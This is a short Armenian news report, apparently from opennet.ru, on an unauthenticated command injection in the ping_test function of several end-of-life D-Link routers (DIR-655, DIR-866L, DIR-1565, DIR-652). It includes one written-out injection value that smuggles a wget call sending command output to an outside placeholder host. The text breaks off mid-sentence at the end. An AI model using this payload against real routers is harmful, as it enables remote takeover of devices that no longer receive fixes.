D-Link անլար երթուղիչներում
Հետաքրքիր է, որ որոնվածը մշակողների կարծիքով, «ping_test» զանգը պետք է կատարվի միայն վավերացումից հետո, բայց իրականում այն կանչվում է ամեն դեպքում՝ անկախ վեբ ինտերֆեյս մուտք գործելուց։ Մասնավորապես, application_sec.cgi սկրիպտին մուտք գործելիս և «action=ping_test» պարամետրը փոխանցելիս սկրիպտը վերահղվում է վավերացման էջ, բայց միևնույն ժամանակ կատարում է ping_test-ի հետ կապված գործողությունը։ Կոդը գործարկելու համար մեկ այլ խոցելիություն է օգտագործվել հենց ping_test-ում, որը կանչում է ping կոմունալ ծրագիրը՝ առանց պատշաճ կերպով ստուգելու փորձարկման ուղարկված IP հասցեի ճիշտությունը: Օրինակ՝ wget կոմունալ ծառայությունը կանչելու և «echo 1234» հրամանի արդյունքները արտաքին հոսթին փոխանցելու համար պարզապես նշեք «ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://» պարամետրը: test.test/?$( echo 1234)»:
Խոցելիության առկայությունը պաշտոնապես հաստատվել է հետևյալ մոդելներում.
- DIR-655 3.02b05 կամ ավելի հին որոնվածով;
- DIR-866L 1.03b04 կամ ավելի հին որոնվածով;
- DIR-1565 1.01 կամ ավելի հին որոնվածով;
- DIR-652 (որոնք խնդրահարույց տարբերակների մասին տեղեկություններ չեն տրամադրվում)
Այս մոդելների աջակցության ժամկետն արդեն սպառվել է, ուստի D-Link-ը
Ավելի ուշ պարզվեց, որ խոցելիությունը նույնպես եղել է
Source: opennet.ru